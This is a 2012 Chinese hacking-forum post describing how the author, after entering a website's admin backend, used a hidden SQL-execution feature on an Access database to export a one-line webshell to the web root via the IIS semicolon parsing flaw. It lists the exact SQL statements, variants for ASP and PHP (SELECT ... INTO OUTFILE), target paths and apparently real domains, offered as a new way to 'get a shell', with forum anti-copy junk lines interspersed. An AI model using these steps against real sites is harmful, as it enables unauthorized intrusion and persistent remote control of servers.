中国网络渗透测试联盟
标题:
ACCESS执行SQL命令导出一句话SHELL
[打印本页]
作者:
admin
时间:
2012-9-13 17:53
标题:
ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
; G( \5 A0 X( {6 h( B) d' ]
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
# K' e/ ]; U! d3 ]
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
8 V% s E+ t# v7 s# r5 ?9 V" F
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
- U( _3 e( h$ w7 ~) T6 x/ Q
1.create table cmd (a varchar(50))
! m% ~( F: @- T
2.insert into cmd (a) values (‘‘)
. f+ o8 k5 D j- x( m
3.select * into [a] in ‘D:\wwwroot\
www.koohik.com
\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
Z' ^5 W8 z+ |+ I
(把表cmd的内容导出为物理路径的一个EXCEL文件)
/ f" a# f9 {, y; k* K
4.drop table cmd
6 m. y3 w1 c1 v# w7 m. \$ I2 q
利用IIS的BUG成功拿到了WEBSHELL。
0 B3 E1 Q8 n5 Y3 X1 ?7 b4 }; ?0 Y
, l2 X" o0 U- X5 w- T' T- H+ \
直接菜刀里连接
http://www.chouwazi.com/data/xiao.asp;xiao.xls
一句话
5 R4 }: p, h1 V _
- J: P3 `' R$ j) k, |! Y3 e$ |
SQL语句意思解释:
. g# u& E. v* n0 A
第一句
0 B: E* {( \/ G- h5 L @) h
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
5 }0 @0 k2 p7 C/ h% _
5 @8 s% g c) N4 V- ?% {. F& {3 G
第二句
& @( S7 h! Z; z) y# ^4 v. X
在表cmd的a字段插入一句话木马
# m h1 p, O& N' U
第三句
6 A! p7 I7 J" n2 K6 L1 z
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
2 g8 M0 }5 x- G$ J
+ b0 N: O1 Y) X9 T
第四句
1 p0 `6 U; W- u, s0 X
删除建立的cmd表
2 h- f( ?0 w2 F+ p+ R$ F# l
- Z& `. [) ]0 k6 e: A! K, |
以下内容为测试:
/ p- N& X0 s. z5 w C, W
Access利用后台SQL执行命令功能导出WebShell:
% |' }% v( j9 z) n2 a6 d0 G
这个更简单:
5 @) x1 r# y4 q; _
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
4 }1 N, c. K9 |3 |7 p
或者
& z) q( r) e2 J# n' b
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
9 U+ Y1 O! f+ R
7 B4 c$ Z$ w$ @1 U
后台有执行SQL语句功能(vote为已知表段)
& |* y' }9 G8 j" c1 v
希望对大家有所帮助拿shell的又一个思路
( c9 [9 Y$ a1 Q( M% n. q Z+ ^! `
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2